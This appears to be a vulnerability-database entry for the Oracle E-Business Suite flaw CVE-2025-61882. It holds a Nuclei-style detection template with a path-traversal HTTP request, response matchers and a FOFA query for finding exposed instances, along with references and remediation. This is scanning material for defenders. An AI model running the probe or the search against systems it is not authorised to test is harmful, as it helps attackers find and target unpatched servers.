漏洞描述
Oracle Concurrent Processing 12.2.3-12.2.14 contains a remote code execution caused by unauthenticated network access via HTTP, letting unauthenticated attackers fully compromise the system, exploit requires network access via HTTP.
CVE-2025-61882: Oracle E-Business Suite 12.2.3–12.2.14 – Remote Code Execution
PoC代码[已公开]
id: CVE-2025-61882
info:
name: Oracle E-Business Suite 12.2.3–12.2.14 – Remote Code Execution
author: DhiyaneshDk,watchtowr
severity: critical
description: |
Oracle Concurrent Processing 12.2.3-12.2.14 contains a remote code execution caused by unauthenticated network access via HTTP, letting unauthenticated attackers fully compromise the system, exploit requires network access via HTTP.
impact: |
Unauthenticated attackers can fully compromise Oracle Concurrent Processing, leading to complete system takeover.
remediation: |
Update to the latest available version beyond 12.2.14.
reference:
- https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
- https://github.com/watchtowrlabs/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882
- https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
- https://blogs.oracle.com/security/post/apply-july-2025-cpu
metadata:
verified: true
max-request: 1
fofa-query: title="E-Business Suite"
tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev,vuln
http:
- raw:
- |
GET /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: lfi
dsl:
- "status_code == 200"
- "contains(body, '$Header: ieshostedsurvey.jsp')"
condition: and
# digest: 4a0a004730450220432df4021b69b7b90dbee1b1b933251e7f843a2381f4443cc9cd4126d5e697b70221009959aa8842202a7fa1fb8e6a5d872c7beae19638e5b91c863ff749630a7e8138:922c64590222798bb761d5b6d8e72950